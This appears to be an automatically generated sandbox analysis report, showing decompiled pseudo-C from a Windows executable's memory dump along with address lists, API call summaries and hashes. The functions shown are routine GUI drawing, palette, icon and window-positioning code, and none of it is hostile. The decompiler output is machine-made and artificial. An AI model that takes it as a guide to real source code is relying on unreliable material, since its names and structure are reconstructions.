				E00437760(_t82, _t99, 0x14, 0);
				E00437760(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00414208( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043AD08(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                                                        0x0043ad13
                                                                        0x0043ad15
                                                                        0x0043ad17
                                                                        0x0043ad23
                                                                        0x0043ad2d
                                                                        0x0043ad3f
                                                                        0x0043ad44
                                                                        0x0043ad48
                                                                        0x0043ad5d
                                                                        0x0043ad77
                                                                        0x0043ad7c
                                                                        0x0043ad81
                                                                        0x0043ad83
                                                                        0x0043ad8a
                                                                        0x0043ad8a
                                                                        0x0043ad5f
                                                                        0x0043ad5f
                                                                        0x0043ad66
                                                                        0x0043ad66
                                                                        0x0043ad91
                                                                        0x0043ada3
                                                                        0x0043adb2
                                                                        0x0043adbf
                                                                        0x0043add7
                                                                        0x0043add7
                                                                        0x0043ade7
                                                                        0x0043adf7
                                                                        0x0043adfc
                                                                        0x0043ae04
                                                                        0x0043ae43
                                                                        0x0043ae48
                                                                        0x0043ae4d
                                                                        0x0043ae59
                                                                        0x0043ae06
                                                                        0x0043ae09
                                                                        0x0043ae0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043ae0f
                                                                        0x0043ae12
                                                                        0x0043ae19
                                                                        0x0043ae22
                                                                        0x0043ae27
                                                                        0x0043ae2b
                                                                        0x0043ae36
                                                                        0x0043ae36
                                                                        0x0043ae3b
                                                                        0x0043ae3e
                                                                        0x0043ae3e
                                                                        0x0043ae3e
                                                                        0x00000000
                                                                        0x0043ae19

                                                                        APIs
                                                                        • SaveDC.GDI32 ref: 0043AD1E
                                                                          • Part of subcall function 00434EE8: GetWindowOrgEx.GDI32(?), ref: 00434EF6
                                                                          • Part of subcall function 00434EE8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434F0C
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043AD3F
                                                                        • GetWindowLongA.USER32 ref: 0043AD55
                                                                        • GetWindowLongA.USER32 ref: 0043AD77
                                                                        • SetRect.USER32 ref: 0043ADA3
                                                                        • DrawEdge.USER32(?,?,?,00000000), ref: 0043ADB2
                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043ADD7
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AE48
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                        • String ID:
                                                                        • API String ID: 2976466617-0
                                                                        • Opcode ID: 7579a09f0e1fb688d0282343193c5f5ef11fca35c4dbc9b8d67e96162047c833
                                                                        • Instruction ID: 5230efab144cf00d1e86c4fe0b99e01b1b6c0be5c34e2f34689cb1fb78e5a635
                                                                        • Opcode Fuzzy Hash: 7579a09f0e1fb688d0282343193c5f5ef11fca35c4dbc9b8d67e96162047c833
                                                                        • Instruction Fuzzy Hash: 98417171B002056BDB10EBA9CC81FAF77A9AF48304F10516AF905EB396DB79DD0187A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045DC38, Relevance: 12.1, APIs: 8, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0045DC38(void* __eax, void* __edx, void* __edi, void* __esi) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t113;

				_t97 = __eax;
				if(__edx == 0) {
					E00412BA4(0, _t113, 0, __edi, __esi);
					E00412BA4(1,  &_v12, 1, __edi, __esi);
					SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E00435FF4(_t97);
					_t55 = E00435FB0(_t97);
					SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E00435FF4(_t97);
					_t63 = E00435FB0(_t97);
					return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E00412BA4(E00412BA4(E00435FB0(__eax), _t113, 0, __edi, __esi) | 0xffffffff,  &_v12, 1, __edi, __esi);
				SetMapMode(E00420730( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E00435FF4(_t97);
				_t84 = E00435FB0(_t97);
				SetViewportExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E00435FF4(_t97);
				_t92 = E00435FB0(_t97);
				return SetWindowExtEx(E00420730( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}


















                                                                        0x0045dc3c
                                                                        0x0045dc40
                                                                        0x0045dcf0
                                                                        0x0045dd03
                                                                        0x0045dd16
                                                                        0x0045dd33
                                                                        0x0045dd3c
                                                                        0x0045dd44
                                                                        0x0045dd56
                                                                        0x0045dd5f
                                                                        0x0045dd6b
                                                                        0x00000000
                                                                        0x0045dd81
                                                                        0x0045dc62
                                                                        0x0045dc75
                                                                        0x0045dc92
                                                                        0x0045dc9b
                                                                        0x0045dca3
                                                                        0x0045dcb5
                                                                        0x0045dcbe
                                                                        0x0045dcca
                                                                        0x00000000

                                                                        APIs
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DC75
                                                                        • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DC92
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCB5
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DCE0
                                                                        • SetMapMode.GDI32(00000000,00000008), ref: 0045DD16
                                                                        • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045DD33
                                                                        • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD56
                                                                        • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045DD81
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ModeViewport
                                                                        • String ID:
                                                                        • API String ID: 3149394475-0
                                                                        • Opcode ID: 72d5af6f7a7dd3e9eb6d3237a2dc3e9abd385e6a9d96b064c7a12b1895184f0e
                                                                        • Instruction ID: 8f84e7b93b444426f7dca1db73b7397be018fa4546cd3fd7a1a3ea71a0fadf7e
                                                                        • Opcode Fuzzy Hash: 72d5af6f7a7dd3e9eb6d3237a2dc3e9abd385e6a9d96b064c7a12b1895184f0e
                                                                        • Instruction Fuzzy Hash: B6313E707083006BD640FF7A8C96B4B629C9F44308F40593E7959DF297CA3DE8454769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421068, Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E00421068(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E004029BC(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0x421165);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(E0042116C);
				return ReleaseDC(0, _v8);
			}














                                                                        0x00421069
                                                                        0x00421072
                                                                        0x0042107b
                                                                        0x0042108f
                                                                        0x0042109b
                                                                        0x004210a0
                                                                        0x004210a1
                                                                        0x004210a6
                                                                        0x004210a9
                                                                        0x004210b7
                                                                        0x004210bc
                                                                        0x004210d1
                                                                        0x004210e0
                                                                        0x00421147
                                                                        0x004210e2
                                                                        0x004210f5
                                                                        0x00421113
                                                                        0x00421127
                                                                        0x00421127
                                                                        0x004210e0
                                                                        0x0042114e
                                                                        0x00421151
                                                                        0x00421154
                                                                        0x00421164

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00421096
                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 004210B2
                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004210D1
                                                                        • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 004210F5
                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00421113
                                                                        • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00421127
                                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00421147
                                                                        • ReleaseDC.USER32 ref: 0042115F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                        • String ID:
                                                                        • API String ID: 1781840570-0
                                                                        • Opcode ID: dc843899b990a3085b2cec699ce40cc4c32d7f9abe66eaea43dc606af4fd6091
                                                                        • Instruction ID: f0e1a453716523f1c9eecebf53a0f2200f9152a329f4876d0861d21903a57afc
                                                                        • Opcode Fuzzy Hash: dc843899b990a3085b2cec699ce40cc4c32d7f9abe66eaea43dc606af4fd6091
                                                                        • Instruction Fuzzy Hash: 8B2183F5A00218AADB10DBA5CD85FAE77BCEB08704F5104A6F708F71C1D679AF548B28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421658, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E00421658() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E004214CC( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E004214D8( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E004083E8(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x42183f, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E00421310( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E004083E8( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x42181c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x496714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420A80(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E00421823);
				return E00402774( *(_t198 - 0x30));
			}













                                                                        0x0042165a
                                                                        0x00421669
                                                                        0x0042166f
                                                                        0x00421672
                                                                        0x00421674
                                                                        0x00421679
                                                                        0x0042168a
                                                                        0x0042168f
                                                                        0x004216b6
                                                                        0x004216b9
                                                                        0x004216b9
                                                                        0x004216bc
                                                                        0x004216bd
                                                                        0x004216bd
                                                                        0x004216bd
                                                                        0x00421679
                                                                        0x004216cb
                                                                        0x004216d7
                                                                        0x004216e3
                                                                        0x004216f1
                                                                        0x004216ff
                                                                        0x00421719
                                                                        0x0042172c
                                                                        0x0042173b
                                                                        0x0042174a
                                                                        0x00421759
                                                                        0x00421769
                                                                        0x00421778
                                                                        0x00421780
                                                                        0x0042178b
                                                                        0x00421790
                                                                        0x00421791
                                                                        0x00421796
                                                                        0x00421799
                                                                        0x0042179c
                                                                        0x004217a2
                                                                        0x004217aa
                                                                        0x004217b8
                                                                        0x004217c1
                                                                        0x004217ca
                                                                        0x004217e6
                                                                        0x004217f4
                                                                        0x004217fc
                                                                        0x004217fe
                                                                        0x004217fe
                                                                        0x00421805
                                                                        0x00421808
                                                                        0x0042180b
                                                                        0x0042181b

                                                                        APIs
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0042174A
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00421759
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217AA
                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 004217B8
                                                                        • DeleteObject.GDI32(?), ref: 004217C1
                                                                        • DeleteObject.GDI32(?), ref: 004217CA
                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 004217EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                        • String ID:
                                                                        • API String ID: 1030595962-0
                                                                        • Opcode ID: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction ID: 013013fe9648ae5886e4b8230851134a27cb4e01da0e6262b179e60b3c39ad5f
                                                                        • Opcode Fuzzy Hash: 0836e0556076b5f12d1ae0eb89dd1a5762be714dfc8aaf9dfb912e760cb5b2e7
                                                                        • Instruction Fuzzy Hash: ED611875A00229AFCB00EFA9D881E9EBBF9FF48304B554466F804EB361D734AD51CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00475338, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E00475338(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				void* _v32;
				struct tagPOINT _v40;
				void* _t55;
				void* _t56;
				signed char _t60;
				struct HWND__* _t61;
				void* _t64;
				void* _t66;
				struct HWND__* _t73;
				signed short _t80;
				void* _t89;
				int _t93;
				long _t106;
				intOrPtr* _t112;
				intOrPtr _t123;
				intOrPtr _t124;
				void* _t132;
				signed char* _t141;
				void* _t144;
				void* _t145;
				struct HWND__* _t148;
				void* _t152;

				_v16 = 0;
				_t144 = __edx;
				_t112 = __eax;
				_push(_t152);
				_push(0x475537);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xffffffdc;
				E0043AFDC(__eax, 0, __edx, __eflags);
				if(E00475568(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
					L22:
					_pop(_t123);
					 *[fs:eax] = _t123;
					_push(0x47553e);
					return E00404348( &_v16);
				} else {
					_t124 =  *((intOrPtr*)(_t144 + 8));
					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
					if(_t55 == 0) {
						 *((char*)(_t112 + 0x295)) = 1;
						goto L22;
					}
					_t56 = _t55 - 4;
					if(_t56 == 0) {
						_t57 = _t124;
						_t141 =  *(_t124 + 0x14);
						__eflags =  *_t141 & 0x00000001;
						if(( *_t141 & 0x00000001) != 0) {
							_t145 = E00477D88(_t112,  *((intOrPtr*)(_t57 + 0xc)));
							_t60 =  *(_t145 + 0x18);
							__eflags = _t60 - _t141[4];
							if(_t60 < _t141[4]) {
								_t61 =  *(_t145 + 0x14);
								__eflags = _t61;
								if(_t61 > 0) {
									__eflags = _t61 - _t141[4];
									if(_t61 <= _t141[4]) {
										_t141[4] = _t61;
									}
								}
							} else {
								_t141[4] = _t60;
							}
							E00472AA4(_t145, _t141[4]);
						}
					} else {
						_t64 = _t56 - 2;
						if(_t64 == 0) {
							_t66 = E00477D88(_t112,  *((intOrPtr*)(_t124 + 0xc)));
							E00472AA4(_t66, E00426D20(E0043CC2C(_t112),  *((intOrPtr*)(_t124 + 0xc))));
							_t73 =  *((intOrPtr*)( *_t112 + 0x120))();
							__eflags = _t73;
							if(_t73 != 0) {
								 *((intOrPtr*)( *_t112 + 0x7c))();
							}
						} else {
							if(_t64 == 0x12c) {
								_push(E004072A4(GetMessagePos()) & 0x0000ffff);
								_t80 = GetMessagePos();
								_pop(_t132);
								E004067C4(_t80 & 0x0000ffff,  &_v12, _t132);
								E004360F0(_t112,  &_v40,  &_v12);
								_push(_v40.y);
								_t148 = ChildWindowFromPoint(E0043CC2C(_t112), _v40.x);
								__eflags = _t148;
								if(_t148 != 0) {
									_t89 = E0043CC2C(_t112);
									__eflags = _t148 - _t89;
									if(_t148 != _t89) {
										E00404984( &_v16, 0x50);
										_t93 = E00404600(_v16);
										E00404984( &_v16, GetClassNameA(_t148, E004047F8(_v16), _t93));
										E00404744(_v16, "SysHeader32");
										if(__eflags == 0) {
											E004360F0(_t112,  &_v40,  &_v12);
											_v32 = _v40;
											_v28 = _v40.y;
											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
											__eflags = _t106;
											if(_t106 >= 0) {
												E00477D88(_t112, _v20);
												E004037D8(_t112, __eflags);
											}
										}
									}
								}
							}
						}
					}
					goto L22;
				}
			}





























                                                                        0x00475343
                                                                        0x00475346
                                                                        0x00475348
                                                                        0x0047534c
                                                                        0x0047534d
                                                                        0x00475352
                                                                        0x00475355
                                                                        0x0047535c
                                                                        0x0047536a
                                                                        0x00475521
                                                                        0x00475523
                                                                        0x00475526
                                                                        0x00475529
                                                                        0x00475536
                                                                        0x00475381
                                                                        0x00475381
                                                                        0x00475389
                                                                        0x0047538e
                                                                        0x004753ef
                                                                        0x00000000
                                                                        0x004753ef
                                                                        0x00475390
                                                                        0x00475393
                                                                        0x004753aa
                                                                        0x004753ac
                                                                        0x004753af
                                                                        0x004753b2
                                                                        0x004753c2
                                                                        0x004753c4
                                                                        0x004753c7
                                                                        0x004753ca
                                                                        0x004753d1
                                                                        0x004753d4
                                                                        0x004753d6
                                                                        0x004753d8
                                                                        0x004753db
                                                                        0x004753dd
                                                                        0x004753dd
                                                                        0x004753db
                                                                        0x004753cc
                                                                        0x004753cc
                                                                        0x004753cc
                                                                        0x004753e5
                                                                        0x004753e5
                                                                        0x00475395
                                                                        0x00475395
                                                                        0x00475398
                                                                        0x00475402
                                                                        0x0047541c
                                                                        0x00475429
                                                                        0x0047542f
                                                                        0x00475431
                                                                        0x0047543b
                                                                        0x0047543b
                                                                        0x0047539a
                                                                        0x0047539f
                                                                        0x00475450
                                                                        0x00475451
                                                                        0x0047545c
                                                                        0x0047545d
                                                                        0x0047546a
                                                                        0x0047546f
                                                                        0x00475482
                                                                        0x00475484
                                                                        0x00475486
                                                                        0x0047548e
                                                                        0x00475493
                                                                        0x00475495
                                                                        0x004754a3
                                                                        0x004754ab
                                                                        0x004754c5
                                                                        0x004754d2
                                                                        0x004754d7
                                                                        0x004754e1
                                                                        0x004754e9
                                                                        0x004754ef
                                                                        0x004754fe
                                                                        0x00475503
                                                                        0x00475505
                                                                        0x0047550c
                                                                        0x0047551c
                                                                        0x0047551c
                                                                        0x00475505
                                                                        0x004754d7
                                                                        0x00475495
                                                                        0x00475486
                                                                        0x0047539f
                                                                        0x00475398
                                                                        0x00000000
                                                                        0x00475393

                                                                        APIs
                                                                        • GetMessagePos.USER32 ref: 00475443
                                                                        • GetMessagePos.USER32 ref: 00475451
                                                                        • ChildWindowFromPoint.USER32 ref: 0047547D
                                                                        • GetClassNameA.USER32(00000000,00000000,00000000), ref: 004754BB
                                                                        • SendMessageA.USER32 ref: 004754FE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Message$ChildClassFromNamePointSendWindow
                                                                        • String ID: SysHeader32
                                                                        • API String ID: 2510305242-2725536604
                                                                        • Opcode ID: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction ID: 9da0523838ad94a5aacdfd7dfe65334668b87c58a187b1523fb11523a5177e66
                                                                        • Opcode Fuzzy Hash: d034041ecabf4923f7cfd097c591cd5564faaec20f246c75c438c683bcdc8265
                                                                        • Instruction Fuzzy Hash: FA517F70B009056BCB10EF79D9819EEB3E5AF48304B50C17AB819EB356DB7CED058798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E178, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0043E178(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x495c2c; // 0x496c08
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x43e33f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E004365DC(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E00437804(_v8,  &_v28);
				if(E004541C8() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E004541C8() -  *(_v8 + 0x4c);
				}
				if(E004541D4() <  *(_v8 + 0x48) + _v28) {
					_v28 = E004541D4() -  *(_v8 + 0x48);
				}
				if(E004541BC() > _v28) {
					_v28 = E004541BC();
				}
				if(E004541B0() > _v16) {
					_v16 = E004541B0();
				}
				SetWindowPos(E0043CC2C(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404600(_t113) < 0x64 &&  *0x47a8a8 != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E004413CC( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x47a8a8(E0043CC2C(_v8), 0x64,  *0x0047A9B0 | 0x00040000);
					}
				}
				ShowWindow(E0043CC2C(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x43e346);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}















                                                                        0x0043e186
                                                                        0x0043e187
